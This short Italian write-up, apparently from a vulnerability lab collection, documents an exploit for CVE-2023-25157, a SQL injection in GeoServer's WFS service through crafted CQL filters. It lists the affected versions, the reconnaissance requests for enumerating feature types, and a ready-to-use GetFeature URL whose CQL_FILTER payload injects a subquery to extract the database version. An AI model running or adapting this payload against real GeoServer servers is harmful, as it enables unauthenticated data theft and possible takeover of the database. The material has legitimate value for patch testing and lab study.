
Exploit per CVE-2023-25157: iniezione SQL nel servizio WFS di GeoServer tramite sintassi di filtro CQL appositamente predisposta, che consente l'estrazione remota di dati non autenticata e il potenziale compromissione del server di database.
A causa della mancata sanitizzazione dell'input utente, un attaccante remoto non autenticato può costruire una sintassi di filtro malformata, bypassare l'analisi lessicale di GeoServer e provocare un'iniezione SQL, ottenendo informazioni sensibili dal server e potenzialmente anche i permessi del server di database.
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
Ricerca
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

nome della feature per ottenere gli attributi correlati
vulhub:example /geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



